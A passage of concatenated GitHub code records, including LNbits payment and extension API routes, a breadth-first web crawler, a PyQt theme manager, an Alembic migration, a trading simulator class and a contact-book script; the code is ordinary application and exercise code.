Can be wrapped in EventSourceResponse.\n    Listens for incoming payments on a wallet and yields JSON with payment details.\n    \"\"\"\n    this_wallet_id = wallet.id\n\n    payment_queue: asyncio.Queue[Payment] = asyncio.Queue(0)\n\n    uid = f\"{this_wallet_id}_{str(uuid.uuid4())[:8]}\"\n    logger.debug(f\"adding sse listener for wallet: {uid}\")\n    api_invoice_listeners[uid] = payment_queue\n\n    try:\n        while True:\n            if await request.is_disconnected():\n                await request.close()\n                break\n            payment: Payment = await payment_queue.get()\n            if payment.wallet_id == this_wallet_id:\n                logger.debug(\"sse listener: payment received\", payment)\n                yield dict(data=payment.json(), event=\"payment-received\")\n    except asyncio.CancelledError:\n        logger.debug(f\"removing listener for wallet {uid}\")\n    except Exception as exc:\n        logger.error(f\"Error in sse: {exc}\")\n    finally:\n        api_invoice_listeners.pop(uid)\n\n\n@api_router.get(\"/api/v1/payments/sse\")\nasync def api_payments_sse(\n    request: Request, wallet: WalletTypeInfo = Depends(get_key_type)\n):\n    return EventSourceResponse(\n        subscribe_wallet_invoices(request, wallet.wallet),\n        ping=20,\n        media_type=\"text/event-stream\",\n    )\n\n\n# TODO: refactor this route into a public and admin one\n@api_router.get(\"/api/v1/payments/{payment_hash}\")\nasync def api_payment(payment_hash, X_Api_Key: Optional[str] = Header(None)):\n    # We use X_Api_Key here because we want this call to work with and without keys\n    # If a valid key is given, we also return the field \"details\", otherwise not\n    wallet = await get_wallet_for_key(X_Api_Key) if isinstance(X_Api_Key, str) else None\n    wallet = wallet if wallet and not wallet.deleted else None\n    # we have to specify the wallet id here, because postgres and sqlite return\n    # internal payments in different order and get_standalone_payment otherwise\n    # just fetches the first one, causing unpredictable results\n    payment = await get_standalone_payment(\n        payment_hash, wallet_id=wallet.id if wallet else None\n    )\n    if payment is None:\n        raise HTTPException(\n            status_code=HTTPStatus.NOT_FOUND, detail=\"Payment does not exist.\"\n        )\n    await check_transaction_status(payment.wallet_id, payment_hash)\n    payment = await get_standalone_payment(\n        payment_hash, wallet_id=wallet.id if wallet else None\n    )\n    if not payment:\n        raise HTTPException(\n            status_code=HTTPStatus.NOT_FOUND, detail=\"Payment does not exist.\"\n        )\n    elif not payment.pending:\n        if wallet and wallet.id == payment.wallet_id:\n            return {\"paid\": True, \"preimage\": payment.preimage, \"details\": payment}\n        return {\"paid\": True, \"preimage\": payment.preimage}\n\n    try:\n        await payment.check_status()\n    except Exception:\n        if wallet and wallet.id == payment.wallet_id:\n            return {\"paid\": False, \"details\": payment}\n        return {\"paid\": False}\n\n    if wallet and wallet.id == payment.wallet_id:\n        return {\n            \"paid\": not payment.pending,\n            \"preimage\": payment.preimage,\n            \"details\": payment,\n        }\n    return {\"paid\": not payment.pending, \"preimage\": payment.preimage}\n\n\n@api_router.get(\"/api/v1/lnurlscan/{code}\")\nasync def api_lnurlscan(code: str, wallet: WalletTypeInfo = Depends(get_key_type)):\n    try:\n        url = lnurl.decode(code)\n        domain = urlparse(url).netloc\n    except Exception:\n        # parse internet identifier (user@domain.com)\n        name_domain = code.split(\"@\")\n        if len(name_domain) == 2 and len(name_domain[1].split(\".\")) >= 2:\n            name, domain = name_domain\n            url = (\n                (\"http://\" if domain.endswith(\".onion\") else \"https://\")\n                + domain\n                + \"/.well-known/lnurlp/\"\n                + name\n            )\n            
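# added note: this is the LUD-16 \"lightning address\" convention, i.e. user@domain resolves to https://domain/.well-known/lnurlp/user\n            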
# will proceed with these values\n else:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST, detail=\"invalid lnurl\"\n )\n\n # params is what will be returned to the client\n params: Dict = {\"domain\": domain}\n\n if \"tag=login\" in url:\n params.update(kind=\"auth\")\n params.update(callback=url) # with k1 already in it\n\n lnurlauth_key = wallet.wallet.lnurlauth_key(domain)\n assert lnurlauth_key.verifying_key\n params.update(pubkey=lnurlauth_key.verifying_key.to_string(\"compressed\").hex())\n else:\n async with httpx.AsyncClient(follow_redirects=True) as client:\n r = await client.get(url, timeout=5)\n r.raise_for_status()\n if r.is_error:\n raise HTTPException(\n status_code=HTTPStatus.SERVICE_UNAVAILABLE,\n detail={\"domain\": domain, \"message\": \"failed to get parameters\"},\n )\n\n try:\n data = json.loads(r.text)\n except json.decoder.JSONDecodeError:\n raise HTTPException(\n status_code=HTTPStatus.SERVICE_UNAVAILABLE,\n detail={\n \"domain\": domain,\n \"message\": f\"got invalid response '{r.text[:200]}'\",\n },\n )\n\n try:\n tag: str = data.get(\"tag\")\n params.update(**data)\n if tag == \"channelRequest\":\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail={\n \"domain\": domain,\n \"kind\": \"channel\",\n \"message\": \"unsupported\",\n },\n )\n elif tag == \"withdrawRequest\":\n params.update(kind=\"withdraw\")\n params.update(fixed=data[\"minWithdrawable\"] == data[\"maxWithdrawable\"])\n\n # callback with k1 already in it\n parsed_callback: ParseResult = urlparse(data[\"callback\"])\n qs: Dict = parse_qs(parsed_callback.query)\n qs[\"k1\"] = data[\"k1\"]\n\n # balanceCheck/balanceNotify\n if \"balanceCheck\" in data:\n params.update(balanceCheck=data[\"balanceCheck\"])\n\n # format callback url and send to client\n parsed_callback = parsed_callback._replace(\n query=urlencode(qs, doseq=True)\n )\n params.update(callback=urlunparse(parsed_callback))\n elif tag == \"payRequest\":\n params.update(kind=\"pay\")\n params.update(fixed=data[\"minSendable\"] == data[\"maxSendable\"])\n\n params.update(\n description_hash=hashlib.sha256(\n data[\"metadata\"].encode()\n ).hexdigest()\n )\n metadata = json.loads(data[\"metadata\"])\n for [k, v] in metadata:\n if k == \"text/plain\":\n params.update(description=v)\n if k in (\"image/jpeg;base64\", \"image/png;base64\"):\n data_uri = f\"data:{k},{v}\"\n params.update(image=data_uri)\n if k in (\"text/email\", \"text/identifier\"):\n params.update(targetUser=v)\n params.update(commentAllowed=data.get(\"commentAllowed\", 0))\n\n except KeyError as exc:\n raise HTTPException(\n status_code=HTTPStatus.SERVICE_UNAVAILABLE,\n detail={\n \"domain\": domain,\n \"message\": f\"lnurl JSON response invalid: {exc}\",\n },\n )\n\n return params\n\n\n@api_router.post(\"/api/v1/payments/decode\", status_code=HTTPStatus.OK)\nasync def api_payments_decode(data: DecodePayment) -> JSONResponse:\n payment_str = data.data\n try:\n if payment_str[:5] == \"LNURL\":\n url = lnurl.decode(payment_str)\n return JSONResponse({\"domain\": url})\n else:\n invoice = bolt11.decode(payment_str)\n return JSONResponse(invoice.data)\n except Exception as exc:\n return JSONResponse(\n {\"message\": f\"Failed to decode: {str(exc)}\"},\n status_code=HTTPStatus.BAD_REQUEST,\n )\n\n\n@api_router.post(\"/api/v1/lnurlauth\")\nasync def api_perform_lnurlauth(\n data: CreateLnurlAuth, wallet: WalletTypeInfo = Depends(require_admin_key)\n):\n err = await perform_lnurlauth(data.callback, wallet=wallet)\n if err:\n raise HTTPException(\n 
status_code=HTTPStatus.SERVICE_UNAVAILABLE, detail=err.reason\n )\n return \"\"\n\n\n@api_router.get(\"/api/v1/currencies\")\nasync def api_list_currencies_available():\n if len(settings.lnbits_allowed_currencies) > 0:\n return [\n item\n for item in currencies.keys()\n if item.upper() in settings.lnbits_allowed_currencies\n ]\n return list(currencies.keys())\n\n\n@api_router.post(\"/api/v1/conversion\")\nasync def api_fiat_as_sats(data: ConversionData):\n output = {}\n if data.from_ == \"sat\":\n output[\"BTC\"] = data.amount / 100000000\n output[\"sats\"] = int(data.amount)\n for currency in data.to.split(\",\"):\n output[currency.strip().upper()] = await satoshis_amount_as_fiat(\n data.amount, currency.strip()\n )\n return output\n else:\n output[data.from_.upper()] = data.amount\n output[\"sats\"] = await fiat_amount_as_satoshis(data.amount, data.from_)\n output[\"BTC\"] = output[\"sats\"] / 100000000\n return output\n\n\n@api_router.get(\"/api/v1/qrcode/{data}\", response_class=StreamingResponse)\nasync def img(data):\n qr = pyqrcode.create(data)\n stream = BytesIO()\n qr.svg(stream, scale=3)\n stream.seek(0)\n\n async def _generator(stream: BytesIO):\n yield stream.getvalue()\n\n return StreamingResponse(\n _generator(stream),\n headers={\n \"Content-Type\": \"image/svg+xml\",\n \"Cache-Control\": \"no-cache, no-store, must-revalidate\",\n \"Pragma\": \"no-cache\",\n \"Expires\": \"0\",\n },\n )\n\n\n@api_router.websocket(\"/api/v1/ws/{item_id}\")\nasync def websocket_connect(websocket: WebSocket, item_id: str):\n await websocketManager.connect(websocket, item_id)\n try:\n while True:\n await websocket.receive_text()\n except WebSocketDisconnect:\n websocketManager.disconnect(websocket)\n\n\n@api_router.post(\"/api/v1/ws/{item_id}\")\nasync def websocket_update_post(item_id: str, data: str):\n try:\n await websocketUpdater(item_id, data)\n return {\"sent\": True, \"data\": data}\n except Exception:\n return {\"sent\": False, \"data\": data}\n\n\n@api_router.get(\"/api/v1/ws/{item_id}/{data}\")\nasync def websocket_update_get(item_id: str, data: str):\n try:\n await websocketUpdater(item_id, data)\n return {\"sent\": True, \"data\": data}\n except Exception:\n return {\"sent\": False, \"data\": data}\n\n\n@api_router.post(\"/api/v1/extension\")\nasync def api_install_extension(\n data: CreateExtension, user: User = Depends(check_admin)\n):\n release = await InstallableExtension.get_extension_release(\n data.ext_id, data.source_repo, data.archive\n )\n if not release:\n raise HTTPException(\n status_code=HTTPStatus.NOT_FOUND, detail=\"Release not found\"\n )\n\n if not release.is_version_compatible:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST, detail=\"Incompatible extension version\"\n )\n\n ext_info = InstallableExtension(\n id=data.ext_id, name=data.ext_id, installed_release=release, icon=release.icon\n )\n\n ext_info.download_archive()\n\n try:\n ext_info.extract_archive()\n\n extension = Extension.from_installable_ext(ext_info)\n\n db_version = (await get_dbversions()).get(data.ext_id, 0)\n await migrate_extension_database(extension, db_version)\n\n await add_installed_extension(ext_info)\n\n # call stop while the old routes are still active\n await stop_extension_background_work(data.ext_id, user.id)\n\n if data.ext_id not in settings.lnbits_deactivated_extensions:\n settings.lnbits_deactivated_extensions += [data.ext_id]\n\n # mount routes for the new version\n core_app_extra.register_new_ext_routes(extension)\n\n if extension.upgrade_hash:\n 
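# added note: 'nofiy_upgrade' [sic] is the actual, misspelled method name on InstallableExtension as used here\n            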
ext_info.nofiy_upgrade()\n\n return extension\n\n except Exception as ex:\n logger.warning(ex)\n ext_info.clean_extension_files()\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR,\n detail=(\n f\"Failed to install extension {ext_info.id} \"\n f\"({ext_info.installed_version}).\"\n ),\n )\n\n\n@api_router.delete(\"/api/v1/extension/{ext_id}\")\nasync def api_uninstall_extension(ext_id: str, user: User = Depends(check_admin)):\n installable_extensions = await InstallableExtension.get_installable_extensions()\n\n extensions = [e for e in installable_extensions if e.id == ext_id]\n if len(extensions) == 0:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"Unknown extension id: {ext_id}\",\n )\n\n # check that other extensions do not depend on this one\n for valid_ext_id in list(map(lambda e: e.code, get_valid_extensions())):\n installed_ext = next(\n (ext for ext in installable_extensions if ext.id == valid_ext_id), None\n )\n if installed_ext and ext_id in installed_ext.dependencies:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=(\n f\"Cannot uninstall. Extension '{installed_ext.name}' \"\n \"depends on this one.\"\n ),\n )\n\n try:\n # call stop while the old routes are still active\n await stop_extension_background_work(ext_id, user.id)\n\n if ext_id not in settings.lnbits_deactivated_extensions:\n settings.lnbits_deactivated_extensions += [ext_id]\n\n for ext_info in extensions:\n ext_info.clean_extension_files()\n await delete_installed_extension(ext_id=ext_info.id)\n\n logger.success(f\"Extension '{ext_id}' uninstalled.\")\n except Exception as ex:\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR, detail=str(ex)\n )\n\n\n@api_router.get(\n \"/api/v1/extension/{ext_id}/releases\", dependencies=[Depends(check_admin)]\n)\nasync def get_extension_releases(ext_id: str):\n try:\n extension_releases: List[\n ExtensionRelease\n ] = await InstallableExtension.get_extension_releases(ext_id)\n\n return extension_releases\n\n except Exception as ex:\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR, detail=str(ex)\n )\n\n\n@api_router.get(\n \"/api/v1/extension/release/{org}/{repo}/{tag_name}\",\n dependencies=[Depends(check_admin)],\n)\nasync def get_extension_release(org: str, repo: str, tag_name: str):\n try:\n config = await fetch_github_release_config(org, repo, tag_name)\n if not config:\n return {}\n\n return {\n \"min_lnbits_version\": config.min_lnbits_version,\n \"is_version_compatible\": config.is_version_compatible(),\n \"warning\": config.warning,\n }\n except Exception as ex:\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR, detail=str(ex)\n )\n\n\n@api_router.delete(\n \"/api/v1/extension/{ext_id}/db\",\n dependencies=[Depends(check_admin)],\n)\nasync def delete_extension_db(ext_id: str):\n try:\n db_version = (await get_dbversions()).get(ext_id, None)\n if not db_version:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"Unknown extension id: {ext_id}\",\n )\n await drop_extension_db(ext_id=ext_id)\n await delete_dbversion(ext_id=ext_id)\n logger.success(f\"Database removed for extension '{ext_id}'\")\n except HTTPException as ex:\n logger.error(ex)\n raise ex\n except Exception as ex:\n logger.error(ex)\n raise HTTPException(\n status_code=HTTPStatus.INTERNAL_SERVER_ERROR,\n detail=f\"Cannot delete data for extension '{ext_id}'\",\n )\n\n\n@api_router.post(\n \"/api/v1/tinyurl\",\n name=\"Tinyurl\",\n description=\"creates a 
tinyurl\",\n)\nasync def api_create_tinyurl(\n url: str, endless: bool = False, wallet: WalletTypeInfo = Depends(get_key_type)\n):\n tinyurls = await get_tinyurl_by_url(url)\n try:\n for tinyurl in tinyurls:\n if tinyurl:\n if tinyurl.wallet == wallet.wallet.inkey:\n return tinyurl\n return await create_tinyurl(url, endless, wallet.wallet.inkey)\n except Exception:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST, detail=\"Unable to create tinyurl\"\n )\n\n\n@api_router.get(\n \"/api/v1/tinyurl/{tinyurl_id}\",\n name=\"Tinyurl\",\n description=\"get a tinyurl by id\",\n)\nasync def api_get_tinyurl(\n tinyurl_id: str, wallet: WalletTypeInfo = Depends(get_key_type)\n):\n try:\n tinyurl = await get_tinyurl(tinyurl_id)\n if tinyurl:\n if tinyurl.wallet == wallet.wallet.inkey:\n return tinyurl\n raise HTTPException(\n status_code=HTTPStatus.FORBIDDEN, detail=\"Wrong key provided.\"\n )\n except Exception:\n raise HTTPException(\n status_code=HTTPStatus.NOT_FOUND, detail=\"Unable to fetch tinyurl\"\n )\n\n\n@api_router.delete(\n \"/api/v1/tinyurl/{tinyurl_id}\",\n name=\"Tinyurl\",\n description=\"delete a tinyurl by id\",\n)\nasync def api_delete_tinyurl(\n tinyurl_id: str, wallet: WalletTypeInfo = Depends(get_key_type)\n):\n try:\n tinyurl = await get_tinyurl(tinyurl_id)\n if tinyurl:\n if tinyurl.wallet == wallet.wallet.inkey:\n await delete_tinyurl(tinyurl_id)\n return {\"deleted\": True}\n raise HTTPException(\n status_code=HTTPStatus.FORBIDDEN, detail=\"Wrong key provided.\"\n )\n except Exception:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST, detail=\"Unable to delete\"\n )\n\n\n@api_router.get(\n \"/t/{tinyurl_id}\",\n name=\"Tinyurl\",\n description=\"redirects a tinyurl by id\",\n)\nasync def api_tinyurl(tinyurl_id: str):\n tinyurl = await get_tinyurl(tinyurl_id)\n if tinyurl:\n response = RedirectResponse(url=tinyurl.url)\n return response\n else:\n raise HTTPException(\n status_code=HTTPStatus.NOT_FOUND, detail=\"unable to find tinyurl\"\n )\n\n\n@api_router.post(\"/api/v1/webpush\", status_code=HTTPStatus.CREATED)\nasync def api_create_webpush_subscription(\n request: Request,\n data: CreateWebPushSubscription,\n wallet: WalletTypeInfo = Depends(require_admin_key),\n) -> WebPushSubscription:\n subscription = json.loads(data.subscription)\n endpoint = subscription[\"endpoint\"]\n host = urlparse(str(request.url)).netloc\n\n subscription = await get_webpush_subscription(endpoint, wallet.wallet.user)\n if subscription:\n return subscription\n else:\n return await create_webpush_subscription(\n endpoint,\n wallet.wallet.user,\n data.subscription,\n host,\n )\n\n\n@api_router.delete(\"/api/v1/webpush\", status_code=HTTPStatus.OK)\nasync def api_delete_webpush_subscription(\n request: Request,\n wallet: WalletTypeInfo = Depends(require_admin_key),\n):\n endpoint = unquote(\n base64.b64decode(str(request.query_params.get(\"endpoint\"))).decode(\"utf-8\")\n )\n await delete_webpush_subscription(endpoint, wallet.wallet.user)\n","repo_name":"lnbits/lnbits","sub_path":"lnbits/core/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":34994,"program_lang":"python","lang":"en","doc_type":"code","stars":882,"dataset":"github-code","pt":"52"} +{"seq_id":"9325806184","text":"import requests\nimport re\n\n\nclass WebCrawler:\n def __init__(self):\n self.discovered_sites = []\n\n def crawl(self, start_url):\n que = [start_url]\n self.discovered_sites.append(start_url)\n\n # breadth first search\n while que:\n actual_url = que.pop(0)\n print(actual_url)\n 
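# added note: popping from the front of the queue (FIFO) is what keeps this traversal breadth-first\n            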
actual_url_html = self.read_html(actual_url)\n            links = self.get_links(actual_url_html)\n            for url in links:\n                if url not in self.discovered_sites:\n                    self.discovered_sites.append(url)\n                    que.append(url)\n\n    @staticmethod\n    def get_links(html) -> list:\n        return re.findall(r\"https?://(?:[-\\w.]|(?:%[\\da-fA-F]{2}))+\", html)\n\n    @staticmethod\n    def read_html(url) -> str:\n        try:\n            html = requests.get(url).text\n            return html\n        except Exception as e:\n            print(e)\n            return \"\"  # avoid returning None, which would crash get_links()\n\n\nif __name__ == '__main__':\n    crawler = WebCrawler()\n    crawler.crawl('https://www.cnn.com')\n\n#\n","repo_name":"ideaguy3d/algos","sub_path":"@_Graphs/web_crawler.py","file_name":"web_crawler.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"9217956094","text":"from __future__ import annotations\nfrom typehinting import startProgram\n\nfrom miscFunctions import miscFunctions\n\nfrom PyQt5 import QtGui\n\nfrom theme.darkTheme import darkTheme\nfrom theme.lightTheme import lightTheme\n\n# Fixing python to not be shit\ntrue = True;\nfalse = False;\n\nthemeConversion = {\n\t0: \"Dark\",\n\t1: \"Light\"\n}\n\nthemes = {\n\t\"Dark\": darkTheme(),\n\t\"Light\": lightTheme()\n};\n\nclass themeManager():\n\tdef __init__(this, self: startProgram) -> None:\n\t\tthis.functions = miscFunctions(self);\n\t\t\n\t\tthis.setTheme(self, \"main\");\n\t# End of function\n\n\n\tdef setTheme(this, self: startProgram, window: str, ) -> None:\n\t\tthemeString = this._themeConvert(self.settings[\"theme\"]);\n\t\t\n\t\tthemeClass: darkTheme | lightTheme;\n\t\tthemeClass = themes[themeString];\n\t\t\n\t\tif(window == \"main\"):\n\t\t\tthis._setIcons(self, themeString)\n\t\t\treturn themeClass.mainWindowTheme(self);\n\t\t\t\n\t\tif(window == \"world\"):\n\t\t\treturn themeClass.worldWindowTheme(self);\n\t\t\t\n\t\tif(window == \"credits\"):\n\t\t\treturn themeClass.creditWindowTheme(self);\n\t\t\t\n\t\tif(window == \"options\"):\n\t\t\treturn themeClass.optionsWindowTheme(self);\n\t\t\t\n\t\tif(window == \"person\"):\n\t\t\treturn themeClass.personWindowTheme(self);\n\t\t\t\n\t\tif(window == \"relation\"):\n\t\t\treturn themeClass.relationWindowTheme(self);\n\t# End of function\n\t\n\t\n\tdef _themeConvert(this, theme: int) -> str:\n\t\tthemeType = themeConversion[theme];\n\t\treturn themeType;\n\t# End of function\n\n\n\tdef _setIcons(this, self: startProgram, theme: str) -> None:\n\t\n\t\tself.deathIcon = this._QIcon(f\"icons\\\\dead_{theme}.png\");\n\t\t\n\t\t# Character related\n\t\tself.ui.actionAdd_Character.setIcon(this._QIcon(f\"icons\\\\addPerson_{theme}.png\"));\n\t\tself.ui.actionEdit_Character.setIcon(this._QIcon(f\"icons\\\\editCharacter_{theme}.png\"));\n\t\tself.ui.actionRemove_Character.setIcon(this._QIcon(f\"icons\\\\removeCharacter_{theme}.png\"));\n\n\t\t# File related\n\t\tself.ui.action_New.setIcon(this._QIcon(f\"icons\\\\new_{theme}.png\"));\n\t\tself.ui.action_Open.setIcon(this._QIcon(f\"icons\\\\open_{theme}.png\"));\n\t\tself.ui.action_Save.setIcon(this._QIcon(f\"icons\\\\save_{theme}.png\"));\n\t\tself.ui.actionSave_As.setIcon(this._QIcon(f\"icons\\\\saveAs_{theme}.png\"));\n\t\t\n\t\t# Misc\n\t\tself.ui.actionRefresh.setIcon(this._QIcon(f\"icons\\\\refresh_{theme}.png\"));\n\t\tself.ui.action_Credits.setIcon(this._QIcon(f\"icons\\\\about_{theme}.png\"));\n\t\tself.ui.action_config.setIcon(this._QIcon(f\"icons\\\\settings_{theme}.png\"));\n\t\tself.ui.action_Exit.setIcon(this._QIcon(f\"icons\\\\cancel_{theme}.png\"));\n\t# End of 
function\n\n\n\tdef _QIcon(this, file: str) -> QtGui.QIcon:\n\t\tpath = this.functions.resource_path(file)\n\t\ticon = QtGui.QIcon();\n\t\ticon.addPixmap(QtGui.QPixmap(path));\n\t\treturn icon;\n\t# End of function","repo_name":"Multarix/CharacterTracker","sub_path":"themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
{"seq_id":"74509072803","text":"# n turns in total\n#4242\n# stop once any single number reaches m or more\nn,m,k = map(int,input().split())\narr = list(map(int,input().split()))\nvisited = [0 for _ in range(n)]\npieces = [ 1 for _ in range(k)] #1,1,1\ncnt = 0\n\ndef calc():\n    score = 0\n    for piece in pieces:\n        if piece >= m :\n            score += 1\n    return score\n\ndef find_max(index):\n    global cnt\n    cnt = max(cnt,calc())\n\n    if index == n:\n        return\n\n    for i in range(k):\n        if pieces[i] >= m:\n            continue\n        pieces[i] += arr[index]\n        find_max(index+1)\n        pieces[i] -= arr[index]\n\nfind_max(0)\nprint(cnt)\n\n\n","repo_name":"young0264/hellopycharm","sub_path":"코드트리/Back_Tracking/K개중하나를N번선택_COnditional/1차원윳놀이.py","file_name":"1차원윳놀이.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"3072438681","text":"import pandas as pd\nimport numpy as np\n\nclass Trader():\n    def __init__(self, stock, money, comis, printBool):\n        self.stock = stock\n        self.posVolume = 0\n        self.printBool = printBool\n        #self.Stock_Cash = []\n        self.my_money = money # my cash that is not invested anywhere\n        self.table = pd.DataFrame({'Date':[0], 'Stock_Cash':[0], \"My_money\":[self.my_money], \"Account_money\":[self.my_money] })\n        self.table = self.table.set_index('Date')\n        self.dater = []\n        self.money_of_stock = 0 # value of the holdings; used only when writing to the account-state table\n        self.start_money = 0 # needed to compute the short position\n        self.moneyOnStartDeal = 0\n        self.state = ''\n        self.comis = comis\n        self.moexComis = 50\n        #print(\"printBool------------------------------------------------------------------\", printBool)\n\n    def calcComis(self, prices, volumes):\n        return prices*volumes/100*self.comis + self.moexComis\n    \n    def buy(self, orderVolume, price):\n        if self.posVolume < 0:\n            if self.printBool == True:\n                print(\"\\nBuy with price,\", price, \"Short_Close_Sum\", orderVolume * price, \"\\n\")# the short may not actually be closed here\n            self.my_money = self.my_money + self.start_money + self.start_money - orderVolume * price - self.calcComis(price,orderVolume)\n        self.posVolume = self.posVolume + orderVolume\n        #print(\"self.posVolume\", self.posVolume)\n        #print(\"buying+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n        #self.Stock_Cash.append(self.posVolume * price)\n        if self.posVolume > 0:\n            #print(\"self.posVolume > 0\")\n            #print(\"self.printBool == True\", self.printBool == True)\n            if self.printBool == True:\n                print(\"\\nBuy with price\", price, \"Open_Long_Sum\", orderVolume * price, \"\\n\" )\n            self.state = 'Long'\n            self.my_money = self.my_money - orderVolume * price - self.calcComis(price,orderVolume)\n            if self.moneyOnStartDeal == 0:# i.e. computed only on the first buy, when entering the position; skipped when adding to it, since that would require some kind of averaging\n                self.moneyOnStartDeal = self.calcAccountMoney(price)\n        elif self.posVolume == 0:\n            self.state = ''\n            self.start_money = 0\n            self.moneyOnStartDeal = 0\n            #print(\"stat0000000000000000000000000\")\n        #return self.my_money\n\n    def sell(self, orderVolume, 
price):\n        if self.posVolume > 0:\n            if self.printBool == True:\n                print(\"\\nSell with price,\", price, \"Long_Close_Sum\", orderVolume * price, \"\\n\")\n            self.my_money = self.my_money + orderVolume * price - self.calcComis(price,orderVolume)\n            self.posVolume = self.posVolume - orderVolume\n        elif self.posVolume == 0:\n            self.posVolume = self.posVolume - orderVolume\n            self.my_money = self.my_money - orderVolume * price - self.calcComis(price,orderVolume)\n            if self.moneyOnStartDeal == 0:# i.e. computed only on the first sell, when entering the position; skipped when adding to it, since that would require some kind of averaging\n                self.moneyOnStartDeal = self.calcAccountMoney(price)\n        if self.posVolume < 0:\n            if self.printBool == True:\n                print(\"\\nSell with price,\", price, \"Open_Short_sum\", orderVolume * price, \"\\n\")\n            self.state = 'Short'\n            self.start_money = abs(orderVolume * price)\n            if self.printBool == True:\n                print(\"SELL, self.start_money\", self.start_money, \"my_money\", self.my_money, \"\\n\")\n        elif self.posVolume == 0:\n            self.state = ''\n            self.start_money = 0\n            self.moneyOnStartDeal = 0\n    \n    def calcAccountMoney(self, price):\n        # computes the value of the account's assets\n        if self.state == 'Short':\n            return self.start_money + self.start_money + self.posVolume * price + self.my_money\n        else:\n            #print(self.posVolume * price + self.my_money)\n            return self.posVolume * price + self.my_money\n    \n    def quant_money(self, price, date_now):\n        # updates the account table\n        self.money_of_stock =abs(self.posVolume * price)\n        #self.Stock_Cash.append(self.posVolume * price)\n        self.account_money = self.calcAccountMoney(price) # my cash plus holdings\n        if self.printBool == True:\n            print(\"Quant money: Account_money\", self.account_money, \"posVolume*price\", self.posVolume*price, \"my_money, \", self.my_money, \"cur_price, \", price, \"\\n\")\n        df = pd.DataFrame({\"Date\":[date_now],\n                           \"Stock_Cash\":[int(self.money_of_stock)],\n                           \"My_money\":[int(self.my_money)],\n                           \"Account_money\":[int(self.account_money)]})\n        df = df.set_index('Date')\n        # some housekeeping on the table\n        if self.table.iloc[0, 0] == 0:\n            self.table.iloc[0, 0] = date_now\n        if self.table.iloc[0, 0] == df.iloc[0, 0]:\n            pass\n        else:\n            self.table = pd.concat([self.table, df])\n        return self.getCurrentProfit(price)\n\n    def getCashResult(self):\n        cashFinal = self.table[\"Account_money\"].values[-1] - self.table[\"Account_money\"].values[0]\n        return cashFinal\n    \n    def getAccountMoneyForCurrentData(self, data):\n        # returns the total of cash and assets on the account\n        acm = self.table[\"Account_money\"].values[data]\n        return acm\n    \n    def getCurrentProfit(self, price):\n        #print(self.moneyOnStartDeal)\n        #print(self.calcAccountMoney(price))\n        #print(self.calcAccountMoney(price) - self.moneyOnStartDeal)\n        return self.calcAccountMoney(price) - self.moneyOnStartDeal - self.calcComis(price, self.posVolume)\n    ","repo_name":"gekator/Trader","sub_path":"Trader.py","file_name":"Trader.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"73687772965","text":"\"\"\"empty message\n\nRevision ID: 69d355400a4c\nRevises: \nCreate Date: 2019-07-12 14:35:51.796141\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '69d355400a4c'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_table('TEST')\n    op.alter_column('test', 'name',\n               existing_type=mysql.VARCHAR(length=100),\n               nullable=False)\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.alter_column('test', 'name',\n               existing_type=mysql.VARCHAR(length=100),\n               nullable=True)\n    op.create_table('TEST',\n    sa.Column('id', mysql.INTEGER(display_width=11), autoincrement=True, nullable=False),\n    sa.Column('name', mysql.VARCHAR(length=100), nullable=True),\n    sa.PrimaryKeyConstraint('id'),\n    mysql_default_charset='latin1',\n    mysql_engine='InnoDB'\n    )\n    # ### end Alembic commands ###\n","repo_name":"findsarfaraz/arhamcollections","sub_path":"migrations/versions/69d355400a4c_.py","file_name":"69d355400a4c_.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"16813200601","text":"import csv\nimport sys\n\ndef AddContact(): \n    name = input(\"Name: \").strip()\n    number = int(input(\"Phone number: \").strip())\n    \n    # arrange the data as a dictionary\n    contactInfo = dict(name=name, number=number)\n\n    # write the same information to the csv file\n    with open('data.csv', 'a', newline='') as contact:\n        fieldnames = ['name', 'number']\n        writer = csv.DictWriter(contact, fieldnames=fieldnames)\n        writer.writerow(contactInfo)\n\ndef ContactSearch():\n    \n    with open('data.csv', newline='') as file:\n        # convert the csv into a readable dictionary\n        reader = list(csv.DictReader(file))\n        q = input(\"Enter a name or number: \") # search query\n        for i in range(0, len(reader)):\n            if q in reader[i].values(): \n                print((\"#\")*20, \"Search result\", (\"#\")*20, end=None)\n                result = reader[i].items()\n                print(result)\n                print((\"#\")*20, \"Done\", (\"#\")*20, end=None)\n                break\n            if q not in reader[i].values():\n                \n                continue\n        else:\n            print((\"#\")*20, end=None)\n            print(\"Contact not found!\")\n            